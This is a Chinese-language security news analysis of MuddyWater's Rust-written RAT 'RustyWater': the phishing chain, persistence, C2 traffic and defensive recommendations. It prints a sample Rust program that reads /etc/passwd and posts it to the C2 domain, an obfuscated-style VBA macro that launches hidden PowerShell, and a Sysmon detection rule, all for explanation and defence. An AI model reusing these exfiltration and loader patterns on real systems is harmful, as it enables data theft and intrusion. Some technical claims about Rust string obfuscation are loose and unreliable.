一封看似来自中东某国驻外使馆的邮件静静躺在收件箱里,主题写着:“关于双边数字经济合作的初步意向书”。附件是一个名为“Cooperation_Framework.doc”的Word文档。收件人——一家区域性电信公司的安全主管——毫无戒心地打开文件,并在弹出的提示中点击了“启用内容”。
几秒后,一段VBA宏代码在后台悄然执行,从远程服务器下载了一个体积小巧、无数字签名的可执行文件。该程序迅速在系统注册表中写入持久化项,并与一个名为nomercys.it[.]com的C2(命令与控制)服务器建立加密通信。至此,这台关键业务终端已完全落入攻击者掌控。
这不是虚构情节,而是2026年初由伊朗国家级黑客组织MuddyWater发起的真实攻击。据《The Hacker News》1月10日报道,该组织近期部署了一款代号为“RustyWater”的新型远程访问木马(RAT),其最大特征在于——采用Rust语言编写。这一技术转向不仅标志着MuddyWater工具链的重大演进,更预示着高级持续性威胁(APT)正加速拥抱现代编程语言,以突破传统安全防御体系。
在这场无声的攻防战中,旧有的基于特征码和脚本行为的检测逻辑正面临失效风险。而对全球,尤其是涉及外交、能源、金融等敏感领域的中国机构而言,这场来自中东的风暴,敲响了一记不容忽视的警钟。
一、MuddyWater:伊朗网络情报战的“影子部队”
MuddyWater并非新面孔。自2017年首次被披露以来,该组织已被多方情报机构确认隶属于伊朗情报与安全部(MOIS),长期活跃于中东、南亚及东欧地区。其别名众多——Mango Sandstorm、Static Kitten、TA450——但目标始终如一:窃取政治、经济与军事情报,破坏关键基础设施,服务伊朗国家战略利益。
过去几年,MuddyWater以“低技术高效率”著称。他们大量滥用合法工具(Living-off-the-Land Binaries, LOLBins),如PowerShell、WMI、PsExec,配合定制化轻量级后门(如Phoenix、BugSleep),实现横向移动与数据回传。这种策略有效规避了基于恶意文件签名的检测,使其活动长期潜伏。
然而,随着EDR(端点检测与响应)和XDR(扩展检测与响应)系统的普及,仅靠脚本和系统工具已难逃行为分析引擎的追踪。于是,MuddyWater开始寻求更底层、更可控的武器——这就是RustyWater诞生的背景。
二、RustyWater技术剖析:为何选择Rust?
Rust,这门由Mozilla孵化、以“内存安全”和“零成本抽象”闻名的系统级编程语言,近年来在开源社区和企业开发中迅速崛起。但如今,它也成了国家级黑客的新宠。
1. 规避传统AV检测
传统反病毒软件严重依赖静态特征码(YARA规则、哈希值)和动态沙箱行为分析。而Rust编译生成的二进制文件具有以下特性:
高度优化且结构复杂:Rust的LLVM后端生成的代码与C/C++差异显著,函数布局、字符串加密方式独特,导致现有恶意软件家族分类模型难以匹配;
内置字符串混淆:Rust的format!宏和所有权机制天然导致字符串常量在二进制中分散存储,增加静态提取难度;
无标准运行时依赖:可编译为完全静态链接的独立可执行文件,无需外部DLL,减少行为特征。
例如,一段简单的Rust代码:
fn main() {
let url = "https://nomercys.it[.]com/beacon";
let data = std::fs::read_to_string("/etc/passwd").unwrap();
reqwest::blocking::Client::new()
.post(url)
.body(data)
.send()
.unwrap();
}
经cargo build --release编译后,生成的ELF或PE文件中,“nomercys.it[.]com”不会以明文连续字符串存在,而是被拆分为多个片段或通过运行时拼接,极大干扰静态扫描器。
2. 跨平台能力与性能优势
Rust原生支持Windows、Linux、macOS甚至嵌入式系统。这意味着MuddyWater只需维护一套核心代码,即可针对不同目标环境交叉编译。对于同时渗透政府(Windows)和电信运营商(Linux服务器)的行动而言,效率倍增。
此外,Rust的并发模型(async/await + Tokio运行时)让RustyWater能高效处理多任务:一边监听C2指令,一边后台窃取凭证,同时上传大文件而不阻塞主线程。
3. 模块化与扩展性
据CloudSEK安全团队分析,RustyWater采用插件式架构。主载荷仅负责C2通信和模块加载,具体功能(如浏览器凭证窃取、屏幕截图、键盘记录)由动态下发的DLL或SO模块实现。这种设计便于按需部署,降低初始载荷体积,也方便快速更新攻击能力。
三、攻击链条还原:从鱼叉邮件到持久化控制
Trellix与CloudSEK联合披露的攻击流程清晰展示了MuddyWater的战术成熟度:
初始投递:攻击者发送精心伪造的鱼叉邮件,主题多涉及“区域安全合作”“港口物流协调”“金融监管合规”,附件为带宏的Word文档;
宏触发:文档内嵌VBA宏,诱导用户启用内容。宏代码通常经过混淆,例如:
Sub AutoOpen()
Dim x As String: x = "powershell -ep bypass -c ..."
Shell (x), vbHide
End Sub
实际执行的是从Pastebin或GitHub Gist拉取的PowerShell下载器;
载荷投递:下载器从伪装成云存储的C2服务器获取RustyWater二进制,并写入%APPDATA%\Microsoft\CLR_v4.0\等隐蔽路径;
持久化:通过注册表Run键(Windows)或systemd服务(Linux)实现开机自启;
C2通信:使用HTTPS与硬编码域名通信,心跳包包含主机名、IP、OS版本等侦察信息;
横向移动:一旦站稳脚跟,RustyWater会尝试利用SMB漏洞、窃取的凭证或PsExec向内网扩散。
值得注意的是,此次活动中使用的C2域名nomercys.it[.]com此前未见于其他恶意活动,表明MuddyWater正采用“一次性基础设施”策略,进一步缩短IOC(失陷指标)的有效期。
四、国际影响与中国启示:我们是否准备好了?
尽管当前RustyWater主要针对中东外交、海事、金融和电信部门,但其技术路径对中国构成直接警示。
首先,中国是伊朗在能源、基建、科技领域的重要合作伙伴,相关企业极可能成为下一阶段目标。其次,Rust木马的跨平台特性意味着,无论目标使用Windows办公终端还是Linux服务器集群,均在攻击范围内。
更值得警惕的是,国内安全产业对Rust恶意软件的检测能力仍显薄弱。多数EDR产品基于Windows API Hook或进程行为树分析,而Rust程序因调用模式与传统C++恶意软件不同,常被误判为“正常应用”。
公共互联网反网络钓鱼工作组技术专家芦笛指出:“我们过去重点监控PowerShell和VBS,现在必须把Rust、Go、Nim等现代语言编译的二进制纳入高危对象清单。”
他举例说,2025年国内某大型国企曾遭遇一起疑似APT攻击,EDR多次告警“未知进程联网”,但因该进程无恶意特征、行为‘安静’,被误判为内部开发工具,直至数据泄露才被发现。“后来溯源发现,那正是一个Rust编写的轻量级后门。”
五、深度防御建议:从“识别文件”到“理解行为”
面对RustyWater这类高隐蔽性威胁,传统“黑名单+签名”模式已力不从心。专家建议采取多层次防御策略:
1. 强化邮件网关与宏策略
默认禁用Office宏,尤其来自外网邮件的文档;
部署支持深度内容分析的邮件安全网关,检测VBA宏中的可疑网络请求或编码特征;
对所有附件进行沙箱 detonation,观察是否有后续下载行为。
2. 监控异常Rust二进制行为
虽然无法阻止Rust程序运行,但可关注其异常行为模式:
非开发人员主机上出现rustc、cargo相关进程;
可执行文件位于临时目录却频繁联网;
进程内存中存在大量加密字符串或反射式加载代码。
可通过EDR自定义规则实现检测。例如,在Sysmon中配置:
<RuleGroup name="Suspicious Rust Binaries" groupRelation="or">
<ProcessCreate onmatch="include">
<Image condition="contains">\.exe</Image>
<CommandLine condition="contains">nomercys</CommandLine>
</ProcessCreate>
<NetworkConnect onmatch="include">
<DestinationHostname condition="is">nomercys.it</DestinationHostname>
</NetworkConnect>
</RuleGroup>
3. 实施最小权限与网络分段
即使主机被控,也应限制其横向移动能力:
普通员工账户禁用本地管理员权限;
关键服务器置于独立VLAN,限制SMB/RDP等高危协议访问;
启用网络微隔离(Micro-segmentation),阻止非授权内网通信。
4. 推动国产化安全工具支持现代语言分析
芦笛呼吁国内安全厂商加快研发针对Rust、Go等语言的专用检测模块:“不能总等国外披露了才跟进。我们需要自己的恶意软件基因库和行为分析模型。”
六、未来趋势:国家级APT正全面“现代化”
MuddyWater转向Rust,绝非孤例。近年来,多起APT活动显示,国家级黑客正系统性升级其工具链:
俄罗斯Sandworm使用Go编写Industroyer2工业控制系统恶意软件;
朝鲜Lazarus集团采用Nim语言开发AppleJeus macOS后门;
中国部分红队也开始用Rust构建渗透测试工具,因其稳定性和跨平台优势。
这标志着APT攻击进入“现代化武器时代”:不再追求炫技漏洞,而是以工程化、模块化、低噪声的方式实现长期潜伏。
对防御方而言,这意味着必须从“追特征”转向“建能力”——构建基于行为基线、上下文感知和自动化响应的主动防御体系。
结语
当伊朗黑客用Rust重写他们的间谍工具,一场静默的技术军备竞赛已然升级。RustyWater或许只是冰山一角,但它清晰地传递了一个信号:未来的网络战场,胜负不再取决于谁掌握最稀有的0day,而在于谁能更好地驾驭现代软件工程的力量。
对中国而言,这既是挑战,也是倒逼安全体系进化的契机。唯有将技术洞察、制度建设和产业协同拧成一股绳,才能在这场没有硝烟的战争中守住数字国土的边界。
正如一位安全研究员在社交平台上所写:“他们用Rust写木马,我们就用Rust写盾牌——这才是真正的攻防对等。”
编辑:芦笛(公共互联网反网络钓鱼工作组)
